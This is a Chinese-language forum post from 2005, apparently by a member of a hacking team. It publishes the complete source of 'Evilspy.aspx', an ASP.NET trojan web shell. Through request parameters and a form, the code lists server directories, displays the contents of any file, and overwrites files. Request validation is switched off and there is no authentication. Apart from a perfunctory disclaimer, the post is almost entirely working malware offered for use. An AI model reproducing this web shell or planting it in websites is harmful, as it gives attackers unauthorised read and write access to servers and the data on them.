邪恶asp.net木马 Evilspy.aspx ver1.0测试版

文章作者：swords [E.S.T]
信息来源：邪恶八进制信息安全团队

邪恶asp.net木马 Evilspy.aspx ver1.0测试版
designed by swords[E.S.T]
本程序在开发中，很多功能等待加入，请不要用于非法用途.
俺刚学asp.net，发现bug请到我的blog [url]http://wmjie.51.net/swords/[/url] 留言，thanks，请高手多多指教。QQ:78623269
Copyright © 2005-2005 邪恶八进制安全团队 All Rights Reserved.

<%@ import namespace="system.IO"%> <%@page validateRequest=false %> <script Language="VB" runat="server"> private evilspy as string="邪恶asp.net木马 Evilspy.aspx ver1.0测试版" private dir as directoryinfo private f as fileinfo private strdir as string private strf as string Sub Page_Load(Src as object, E as EventArgs) if not page.ispostback then strdir =request.params("dir") if strdir="" then strdir=server.mappath(".") end if tbdir.text=strdir dir=new directoryinfo(strdir) listfiles() strf =request.params("f") if strf="" then tbcontents.visible=false btwrite.visible=false else tbf.text=strf f=new fileinfo(strf) displayfile() end if end if end sub sub tbdir_handle(obj as object,e as eventargs) strdir=tbdir.text if directory.exists(strdir) then dir=new directoryinfo(strdir) listfiles() else tbcontents.text="invalid!" end if end sub sub tbf_handle(obj as object,e as eventargs) strf=tbf.text if file.exists(strf) then f=new fileinfo(strf) displayfile() else tbcontents.text="invalid!" end if end sub sub listfiles() dim h1 as hyperlink dim d as directoryinfo dim fi as fileinfo if not dir.root.fullname=dir.fullname then h1=new hyperlink h1.text=".." h1.navigateurl="ser.aspx?dir=" & server.urlencode(dir.parent.fullname) panel1.controls.add(h1) panel1.controls.add(new literalcontrol("<br>")) end if for each d in dir.getdirectories h1=new hyperlink h1.text=d.name h1.navigateurl="ser.aspx?dir=" & server.urlencode(d.fullname) panel1.controls.add(h1) panel1.controls.add(new literalcontrol("<br>")) next for each fi in dir.getfiles("*.*") h1=new hyperlink h1.text=fi.name h1.navigateurl="ser.aspx?f=" & server.urlencode(fi.fullname) panel1.controls.add(h1) panel1.controls.add(new literalcontrol("<br>")) next end sub sub displayfile() strf=tbf.text dim objreader as streamreader if strf<>"" then if file.exists(strf) then if not tbcontents.visible then tbcontents.visible=true btwrite.visible=true else tbcontents.text="" fiinfo() end if objreader=new streamreader(strf) tbcontents.text+=objreader.readtoend objreader.close else tbcontents.text="invalid!" end if end if end sub sub fiinfo()         f =new fileinfo(strf)         label1.text="文件信息:<br>Name:"& f.name &"<br>Path:" & f.directoryname & "<br>Create Time:" & _               f.CreationTime & "<br>Last Access Time:" & f.lastaccesstime & "<br>Last Write Time:" & _               f.lastwritetime & "<br>Length:" & f.length & "bytes<br>Attributes:" & f.attributes & "<p>"             dir=f.directory         label1.text+="目录信息:<br>Name:"& dir.name &"<br>Full Name:" & dir.fullname & "<br>Create Time:" & _               dir.CreationTime & "<br>Last Access Time:" & dir.lastaccesstime & "<br>Last Write Time:" & _               dir.lastwritetime & "<br>Parent:" & dir.parent.name & "<br>Attributes:" & dir.attributes & "<p>" end sub sub writefile(obj as object,e as eventargs) dim strcontents as string=tbcontents.text strf=tbf.text dim objwriter as streamwriter if file.exists(strf) then objwriter=new streamwriter(strf,false) objwriter.write(strcontents) objwriter.close end if end sub </script> <html><title><%=evilspy%></title><body> <div style="padding:15,15,15,15;font-size:10pt;font-family:verdana"; border-width:2px 2px 2px 2px; border-style:solid; border-color:black;"> <center><a href="[url]http://wmjie.51.net/swords/[/url]" target="_blank"><%=evilspy%></a></center> <form runat="server"> <b>目录:</b><asp:textbox id="tbdir" runat="server" /> <asp:button id="cddir" text="切换目录" runat="server" onclick="tbdir_handle"/><p> <b>文件:</b><asp:textbox id="tbf" runat="server" /> <asp:button id="disf" text="编辑文件" runat="server" onclick="tbf_handle"/><p> <asp:panel id="panel1" runat="server" maintainstate="true"/> <asp:label id="label1" text="" runat="server"/><p> <asp:textbox id="tbcontents" runat="server" textmode="multiline" columns="100" rows="20" /><p> <asp:button id="btwrite" runat="server" text="保存修改"/> </form> <center><b>designed by <a href="[url]http://wmjie.51.net/swords/[/url]" target=_blank>swords[E.S.T]</a><br> 本程序在开发中，很多功能等待加入，请不要用于非法用途.<br> 俺刚学asp.net，发现bug请到我的网站留言，thanks，请高手多多指教。QQ:78623269<br> Copyright © 2005-<%=datetime.now.year%><a href="[url]http://www.eviloctal.com[/url]" target=_blank> 邪恶八进制安全团队</a> All Rights Reserved.</b></center> </div> </body></html>